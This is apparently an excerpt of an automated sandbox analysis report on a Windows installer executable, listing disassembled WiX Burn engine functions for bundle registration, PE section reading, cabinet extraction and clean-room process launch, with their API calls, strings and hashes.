                                                                                                                                                              • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ET|$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
                                                                                                                                                              • API String ID: 760788290-2524221868
                                                                                                                                                              • Opcode ID: c3618e8b0ad503c2e89630e7406494e3164d8110378574ca39e5094cdbe8ef73
                                                                                                                                                              • Instruction ID: d298828534614b90f575026ce455e2c2a77d6125c374975d0dc550e044fece4a
                                                                                                                                                              • Opcode Fuzzy Hash: c3618e8b0ad503c2e89630e7406494e3164d8110378574ca39e5094cdbe8ef73
                                                                                                                                                              • Instruction Fuzzy Hash: 6EE1C432E44625BACF219A64CC46FEDB7AAFF05720F11023DFE21F6291C7699D8096D1
                                                                                                                                                              Function 007CB48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 396 7cb48b-7cb500 call 7ef8e0 * 2 401 7cb538-7cb53e 396->401 402 7cb502-7cb50c GetLastError 396->402 405 7cb540 401->405 406 7cb542-7cb554 SetFilePointerEx 401->406 403 7cb50e-7cb517 402->403 404 7cb519 402->404 403->404 407 7cb51b 404->407 408 7cb520-7cb52d call 7c3821 404->408 405->406 409 7cb588-7cb5a2 ReadFile 406->409 410 7cb556-7cb560 GetLastError 406->410 407->408 425 7cb532-7cb533 408->425 411 7cb5d9-7cb5e0 409->411 412 7cb5a4-7cb5ae GetLastError 409->412 414 7cb56d 410->414 415 7cb562-7cb56b 410->415 419 7cb5e6-7cb5ef 411->419 420 7cbbd7-7cbbeb call 7c3821 411->420 416 7cb5bb 412->416 417 7cb5b0-7cb5b9 412->417 421 7cb56f 414->421 422 7cb574-7cb586 call 7c3821 414->422 415->414 423 7cb5bd 416->423 424 7cb5c2-7cb5d4 call 7c3821 416->424 417->416 419->420 427 7cb5f5-7cb605 SetFilePointerEx 419->427 438 7cbbf0 420->438 421->422 422->425 423->424 424->425 431 7cbbf1-7cbbf7 call 800237 425->431 433 7cb63c-7cb654 ReadFile 427->433 434 7cb607-7cb611 GetLastError 427->434 453 7cbbf8-7cbc0a call 7ee06f 431->453 435 7cb68b-7cb692 433->435 436 7cb656-7cb660 GetLastError 433->436 440 7cb61e 434->440 441 7cb613-7cb61c 434->441 445 7cbbbc-7cbbd5 call 7c3821 435->445 446 7cb698-7cb6a2 435->446 442 7cb66d 436->442 443 7cb662-7cb66b 436->443 438->431 447 7cb625-7cb632 call 7c3821 440->447 448 7cb620 440->448 441->440 451 7cb66f 442->451 452 7cb674-7cb681 call 7c3821 442->452 443->442 445->438 446->445 454 7cb6a8-7cb6cb SetFilePointerEx 446->454 447->433 448->447 451->452 452->435 455 7cb6cd-7cb6d7 GetLastError 454->455 456 7cb702-7cb71a ReadFile 454->456 462 7cb6d9-7cb6e2 455->462 463 7cb6e4 455->463 464 7cb71c-7cb726 GetLastError 456->464 465 7cb751-7cb769 ReadFile 456->465 462->463 469 7cb6eb-7cb6f8 call 7c3821 463->469 470 7cb6e6 463->470 471 7cb728-7cb731 464->471 472 7cb733 464->472 467 7cb76b-7cb775 GetLastError 465->467 468 7cb7a0-7cb7bb SetFilePointerEx 465->468 473 7cb777-7cb780 467->473 474 7cb782 467->474 476 7cb7bd-7cb7c7 GetLastError 468->476 477 7cb7f5-7cb814 ReadFile 468->477 469->456 470->469 471->472 478 7cb73a-7cb747 call 7c3821 472->478 479 7cb735 472->479 473->474 482 7cb789-7cb796 call 7c3821 474->482 483 7cb784 474->483 485 7cb7c9-7cb7d2 476->485 486 7cb7d4 476->486 480 7cbb7d-7cbb87 GetLastError 477->480 481 7cb81a-7cb81c 477->481 478->465 479->478 490 7cbb89-7cbb92 480->490 491 7cbb94 480->491 488 7cb81d-7cb824 481->488 482->468 483->482 485->486 492 7cb7db-7cb7eb call 7c3821 486->492 493 7cb7d6 486->493 496 7cbb58-7cbb75 call 7c3821 488->496 497 7cb82a-7cb836 488->497 490->491 499 7cbb9b-7cbbb1 call 7c3821 491->499 500 7cbb96 491->500 492->477 493->492 512 7cbb7a-7cbb7b 496->512 503 7cb838-7cb83f 497->503 504 7cb841-7cb84a 497->504 511 7cbbb2-7cbbba call 800237 499->511 500->499 503->504 508 7cb884-7cb88b 503->508 509 7cbb1b-7cbb32 call 7c3821 504->509 510 7cb850-7cb876 ReadFile 504->510 514 7cb88d-7cb8af call 7c3821 508->514 515 7cb8b4-7cb8cb call 7c394f 508->515 524 7cbb37-7cbb3d call 800237 509->524 510->480 513 7cb87c-7cb882 510->513 511->453 512->511 513->488 514->512 525 7cb8cd-7cb8ea call 7c3821 515->525 526 7cb8ef-7cb904 SetFilePointerEx 515->526 532 7cbb43-7cbb44 524->532 525->431 530 7cb944-7cb969 ReadFile 526->530 531 7cb906-7cb910 GetLastError 526->531 533 7cb96b-7cb975 GetLastError 530->533 534 7cb9a0-7cb9ac 530->534 536 7cb91d 531->536 537 7cb912-7cb91b 531->537 538 7cbb45-7cbb47 532->538 539 7cb977-7cb980 533->539 540 7cb982 533->540 541 7cb9ae-7cb9ca call 7c3821 534->541 542 7cb9cf-7cb9d3 534->542 543 7cb91f 536->543 544 7cb924-7cb934 call 7c3821 536->544 537->536 538->453 545 7cbb4d-7cbb53 call 7c3a16 538->545 539->540 546 7cb989-7cb99e call 7c3821 540->546 547 7cb984 540->547 541->524 550 7cba0e-7cba21 call 804a05 542->550 551 7cb9d5-7cba09 call 7c3821 call 800237 542->551 543->544 561 7cb939-7cb93f call 800237 544->561 545->453 546->561 547->546 564 7cba2d-7cba37 550->564 565 7cba23-7cba28 550->565 551->538 561->532 568 7cba39-7cba3f 564->568 569 7cba41-7cba49 564->569 565->561 571 7cba5a-7cbaba call 7c394f 568->571 572 7cba4b-7cba53 569->572 573 7cba55-7cba58 569->573 576 7cbabc-7cbad8 call 7c3821 571->576 577 7cbade-7cbaff call 7ef360 call 7cb208 571->577 572->571 573->571 576->577 577->538 584 7cbb01-7cbb11 call 7c3821 577->584 584->509
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB502
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB550
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB556
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,aD|H,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB59E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 007CB5A4
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB601
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB607
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB650
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB656
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB6C7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB6CD
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB716
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB71C
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB765
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB76B
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB7B7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB7BD
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB810
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB872
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB8FC
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB906
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                              • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aD|H$burn$section.cpp
                                                                                                                                                              • API String ID: 3411815225-3781528417
                                                                                                                                                              • Opcode ID: 0f2db7f0f9439460780365f31ce51f6f8f50789d3cf002b6bf32ba0162cca00a
                                                                                                                                                              • Instruction ID: 913cd666353541550d0c66ebce3ae663d958030123ac4f830e30e7d7b0f2aec1
                                                                                                                                                              • Opcode Fuzzy Hash: 0f2db7f0f9439460780365f31ce51f6f8f50789d3cf002b6bf32ba0162cca00a
                                                                                                                                                              • Instruction Fuzzy Hash: 5E12A076A40629EBDB709A54CC4AFAB77A4FB04710F1142ADFD14FB281E7799D408BE0
                                                                                                                                                              Function 007E0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 587 7e0d16-7e0d2d SetEvent 588 7e0d6f-7e0d7d WaitForSingleObject 587->588 589 7e0d2f-7e0d39 GetLastError 587->589 592 7e0d7f-7e0d89 GetLastError 588->592 593 7e0db4-7e0dbf ResetEvent 588->593 590 7e0d3b-7e0d44 589->590 591 7e0d46 589->591 590->591 596 7e0d4d-7e0d5d call 7c3821 591->596 597 7e0d48 591->597 594 7e0d8b-7e0d94 592->594 595 7e0d96 592->595 598 7e0df9-7e0dff 593->598 599 7e0dc1-7e0dcb GetLastError 593->599 594->595 600 7e0d9d-7e0db2 call 7c3821 595->600 601 7e0d98 595->601 618 7e0d62-7e0d6a call 800237 596->618 597->596 605 7e0e32-7e0e4b call 7c21ac 598->605 606 7e0e01-7e0e04 598->606 602 7e0dcd-7e0dd6 599->602 603 7e0dd8 599->603 600->618 601->600 602->603 611 7e0ddf-7e0df4 call 7c3821 603->611 612 7e0dda 603->612 621 7e0e4d-7e0e5e call 800237 605->621 622 7e0e63-7e0e6e SetEvent 605->622 607 7e0e28-7e0e2d 606->607 608 7e0e06-7e0e23 call 7c3821 606->608 615 7e10e8-7e10ed 607->615 627 7e10de-7e10e4 call 800237 608->627 611->618 612->611 623 7e10ef 615->623 624 7e10f2-7e10f8 615->624 618->615 641 7e10e5-7e10e7 621->641 629 7e0ea8-7e0eb6 WaitForSingleObject 622->629 630 7e0e70-7e0e7a GetLastError 622->630 623->624 627->641 632 7e0eb8-7e0ec2 GetLastError 629->632 633 7e0ef0-7e0efb ResetEvent 629->633 636 7e0e7c-7e0e85 630->636 637 7e0e87 630->637 638 7e0ecf 632->638 639 7e0ec4-7e0ecd 632->639 642 7e0efd-7e0f07 GetLastError 633->642 643 7e0f35-7e0f3c 633->643 636->637 644 7e0e8e-7e0ea3 call 7c3821 637->644 645 7e0e89 637->645 649 7e0ed6-7e0eeb call 7c3821 638->649 650 7e0ed1 638->650 639->638 641->615 651 7e0f09-7e0f12 642->651 652 7e0f14 642->652 647 7e0f3e-7e0f41 643->647 648 7e0fab-7e0fce CreateFileW 643->648 662 7e10dd 644->662 645->644 656 7e0f6e-7e0f72 call 7c394f 647->656 657 7e0f43-7e0f46 647->657 654 7e100b-7e101f SetFilePointerEx 648->654 655 7e0fd0-7e0fda GetLastError 648->655 649->662 650->649 651->652 659 7e0f1b-7e0f30 call 7c3821 652->659 660 7e0f16 652->660 668 7e1059-7e1064 SetEndOfFile 654->668 669 7e1021-7e102b GetLastError 654->669 663 7e0fdc-7e0fe5 655->663 664 7e0fe7 655->664 680 7e0f77-7e0f7c 656->680 665 7e0f48-7e0f4b 657->665 666 7e0f67-7e0f69 657->666 659->662 660->659 662->627 663->664 674 7e0fee-7e1001 call 7c3821 664->674 675 7e0fe9 664->675 676 7e0f5d-7e0f62 665->676 677 7e0f4d-7e0f53 665->677 666->615 672 7e109b-7e10a8 SetFilePointerEx 668->672 673 7e1066-7e1070 GetLastError 668->673 678 7e102d-7e1036 669->678 679 7e1038 669->679 672->641 684 7e10aa-7e10b4 GetLastError 672->684 681 7e107d 673->681 682 7e1072-7e107b 673->682 674->654 675->674 676->641 677->676 678->679 687 7e103f-7e1054 call 7c3821 679->687 688 7e103a 679->688 685 7e0f7e-7e0f98 call 7c3821 680->685 686 7e0f9d-7e0fa6 680->686 690 7e107f 681->690 691 7e1084-7e1099 call 7c3821 681->691 682->681 693 7e10b6-7e10bf 684->693 694 7e10c1 684->694 685->662 686->641 687->662 688->687 690->691 691->662 693->694 698 7e10c8-7e10d8 call 7c3821 694->698 699 7e10c3 694->699 698->662 699->698
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,007E08BC,?,?), ref: 007E0D25
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0D2F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,007E08BC,?,?), ref: 007E0D74
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0D7F
                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,?,007E08BC,?,?), ref: 007E0DB7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007E08BC,?,?), ref: 007E0DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 1865021742-2104912459
                                                                                                                                                              • Opcode ID: 67666f06e8bdf4c52046c411e23c0c400f38cd8858bc63d6fc533148c3c055c2
                                                                                                                                                              • Instruction ID: 8a4e97da0240b2b94dfe6ead613ac2dae45fff0a2ff3dfdae6b2f4907528746a
                                                                                                                                                              • Opcode Fuzzy Hash: 67666f06e8bdf4c52046c411e23c0c400f38cd8858bc63d6fc533148c3c055c2
                                                                                                                                                              • Instruction Fuzzy Hash: 4591FD37A83672A7D73516A68D0AF566954FF08B30F114225BE20FE6C0D7ADDC8096D1
                                                                                                                                                              Function 007C4D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1069 7c4d39-7c4d81 call 7ef8e0 call 7c33c7 1074 7c4d95-7c4d9f call 7d98f7 1069->1074 1075 7c4d83-7c4d90 call 800237 1069->1075 1081 7c4da8-7c4db7 call 7d98fd 1074->1081 1082 7c4da1-7c4da6 1074->1082 1080 7c4f31-7c4f3b 1075->1080 1083 7c4f3d-7c4f42 CloseHandle 1080->1083 1084 7c4f46-7c4f4a 1080->1084 1087 7c4dbc-7c4dc0 1081->1087 1085 7c4ddd-7c4df8 call 7c1f13 1082->1085 1083->1084 1089 7c4f4c-7c4f51 CloseHandle 1084->1089 1090 7c4f55-7c4f59 1084->1090 1099 7c4dfa-7c4dff 1085->1099 1100 7c4e01-7c4e15 call 7d6a57 1085->1100 1091 7c4dd7-7c4dda 1087->1091 1092 7c4dc2 1087->1092 1089->1090 1093 7c4f5b-7c4f60 CloseHandle 1090->1093 1094 7c4f64-7c4f66 1090->1094 1091->1085 1096 7c4dc7-7c4dd2 call 800237 1092->1096 1093->1094 1097 7c4f68-7c4f69 CloseHandle 1094->1097 1098 7c4f6b-7c4f7f call 7c2782 * 2 1094->1098 1096->1080 1097->1098 1114 7c4f89-7c4f8d 1098->1114 1115 7c4f81-7c4f84 call 805636 1098->1115 1099->1096 1108 7c4e2f-7c4e43 call 7d6b13 1100->1108 1109 7c4e17 1100->1109 1118 7c4e4c-7c4e67 call 7c1f55 1108->1118 1119 7c4e45-7c4e4a 1108->1119 1112 7c4e1c 1109->1112 1116 7c4e21-7c4e2a call 800237 1112->1116 1121 7c4f8f-7c4f92 call 805636 1114->1121 1122 7c4f97-7c4f9f 1114->1122 1115->1114 1126 7c4f2e 1116->1126 1128 7c4e69-7c4e6e 1118->1128 1129 7c4e73-7c4e8c call 7c1f55 1118->1129 1119->1112 1121->1122 1126->1080 1128->1096 1132 7c4e8e-7c4e93 1129->1132 1133 7c4e98-7c4ec4 CreateProcessW 1129->1133 1132->1096 1134 7c4ec6-7c4ed0 GetLastError 1133->1134 1135 7c4f01-7c4f17 call 800a28 1133->1135 1136 7c4edd 1134->1136 1137 7c4ed2-7c4edb 1134->1137 1141 7c4f1c-7c4f20 1135->1141 1139 7c4edf 1136->1139 1140 7c4ee4-7c4efc call 7c3821 1136->1140 1137->1136 1139->1140 1140->1116 1141->1080 1143 7c4f22-7c4f29 call 800237 1141->1143 1143->1126
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F40
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F4F
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F5E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4F69
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to launch clean room process: %ls, xrefs: 007C4EF7
                                                                                                                                                              • Failed to wait for clean room process: %ls, xrefs: 007C4F23
                                                                                                                                                              • burn.filehandle.self, xrefs: 007C4E45
                                                                                                                                                              • %ls %ls, xrefs: 007C4E55
                                                                                                                                                              • D, xrefs: 007C4EA9
                                                                                                                                                              • "%ls" %ls, xrefs: 007C4E7A
                                                                                                                                                              • Failed to allocate parameters for unelevated process., xrefs: 007C4DFA
                                                                                                                                                              • burn.filehandle.attached, xrefs: 007C4E17
                                                                                                                                                              • -%ls="%ls", xrefs: 007C4DE6
                                                                                                                                                              • burn.clean.room, xrefs: 007C4DDE
                                                                                                                                                              • Failed to append original command line., xrefs: 007C4E69
                                                                                                                                                              • Failed to append %ls, xrefs: 007C4E1C
                                                                                                                                                              • Failed to get path for current process., xrefs: 007C4D83
                                                                                                                                                              • engine.cpp, xrefs: 007C4EEA
                                                                                                                                                              • Failed to allocate full command-line., xrefs: 007C4E8E
                                                                                                                                                              • Failed to cache to clean room., xrefs: 007C4DC2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$FileModuleName
                                                                                                                                                              • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                              • API String ID: 3884789274-2391192076
                                                                                                                                                              • Opcode ID: 69fc86ca36a50e824ea6a5e400891aa5b909a19aeb12865c6c2b5635432661f0
                                                                                                                                                              • Instruction ID: 084fa8a731b7b83e0ae4d19fab5c7c1592d9ba4bfd11145149ea9891bbee82c4
                                                                                                                                                              • Opcode Fuzzy Hash: 69fc86ca36a50e824ea6a5e400891aa5b909a19aeb12865c6c2b5635432661f0
                                                                                                                                                              • Instruction Fuzzy Hash: EE719272D00229ABDB219A94CC55FEEBB78FF04720F15422DF920F7291D7789A019BE1
                                                                                                                                                              Function 007D752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1146 7d752a-7d756f call 7ef8e0 call 7c762c 1151 7d757b-7d758c call 7cc407 1146->1151 1152 7d7571-7d7576 1146->1152 1157 7d758e-7d7593 1151->1157 1158 7d7598-7d75a9 call 7cc26e 1151->1158 1154 7d7814-7d781b call 800237 1152->1154 1161 7d781c-7d7821 1154->1161 1157->1154 1168 7d75ab-7d75b0 1158->1168 1169 7d75b5-7d75ca call 7cc4c8 1158->1169 1162 7d7829-7d782d 1161->1162 1163 7d7823-7d7824 call 805636 1161->1163 1166 7d782f-7d7832 call 805636 1162->1166 1167 7d7837-7d783c 1162->1167 1163->1162 1166->1167 1171 7d783e-7d783f call 805636 1167->1171 1172 7d7844-7d7851 call 7cc1bb 1167->1172 1168->1154 1178 7d75cc-7d75d1 1169->1178 1179 7d75d6-7d75e6 call 7ec001 1169->1179 1171->1172 1180 7d785b-7d785f 1172->1180 1181 7d7853-7d7856 call 805636 1172->1181 1178->1154 1189 7d75e8-7d75ed 1179->1189 1190 7d75f2-7d7665 call 7d5c33 1179->1190 1185 7d7869-7d786d 1180->1185 1186 7d7861-7d7864 call 805636 1180->1186 1181->1180 1187 7d786f-7d7872 call 7c3a16 1185->1187 1188 7d7877-7d787f 1185->1188 1186->1185 1187->1188 1189->1154 1195 7d7667-7d766c 1190->1195 1196 7d7671-7d7676 1190->1196 1195->1154 1197 7d767d-7d7698 call 7c5602 GetCurrentProcess call 800879 1196->1197 1198 7d7678 1196->1198 1202 7d769d-7d76b4 call 7c827b 1197->1202 1198->1197 1205 7d76ce-7d76e5 call 7c827b 1202->1205 1206 7d76b6 1202->1206 1211 7d76ee-7d76f3 1205->1211 1212 7d76e7-7d76ec 1205->1212 1208 7d76bb-7d76c9 call 800237 1206->1208 1208->1161 1214 7d774f-7d7754 1211->1214 1215 7d76f5-7d7707 call 7c821f 1211->1215 1212->1208 1216 7d7774-7d777d 1214->1216 1217 7d7756-7d7768 call 7c821f 1214->1217 1225 7d7709-7d770e 1215->1225 1226 7d7713-7d7723 call 7c3436 1215->1226 1220 7d777f-7d7782 1216->1220 1221 7d7789-7d779d call 7da50c 1216->1221 1217->1216 1228 7d776a-7d776f 1217->1228 1220->1221 1224 7d7784-7d7787 1220->1224 1233 7d779f-7d77a4 1221->1233 1234 7d77a6 1221->1234 1224->1221 1229 7d77ac-7d77af 1224->1229 1225->1154 1238 7d772f-7d7743 call 7c821f 1226->1238 1239 7d7725-7d772a 1226->1239 1228->1154 1235 7d77b6-7d77cc call 7cd5a0 1229->1235 1236 7d77b1-7d77b4 1229->1236 1233->1154 1234->1229 1242 7d77ce-7d77d3 1235->1242 1243 7d77d5-7d77ed call 7ccbc5 1235->1243 1236->1161 1236->1235 1238->1214 1245 7d7745-7d774a 1238->1245 1239->1154 1242->1154 1248 7d77ef-7d77f4 1243->1248 1249 7d77f6-7d780d call 7cc8e6 1243->1249 1245->1154 1248->1154 1249->1161 1252 7d780f 1249->1252 1252->1154
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to extract bootstrapper application payloads., xrefs: 007D77EF
                                                                                                                                                              • Failed to load manifest., xrefs: 007D75E8
                                                                                                                                                              • Failed to set original source variable., xrefs: 007D776A
                                                                                                                                                              • Failed to overwrite the %ls built-in variable., xrefs: 007D76BB
                                                                                                                                                              • Failed to open attached UX container., xrefs: 007D758E
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 007D7759
                                                                                                                                                              • Failed to get unique temporary folder for bootstrapper application., xrefs: 007D77CE
                                                                                                                                                              • Failed to get manifest stream from container., xrefs: 007D75CC
                                                                                                                                                              • Failed to load catalog files., xrefs: 007D780F
                                                                                                                                                              • Failed to get source process folder from path., xrefs: 007D7725
                                                                                                                                                              • WixBundleUILevel, xrefs: 007D76D6, 007D76E7
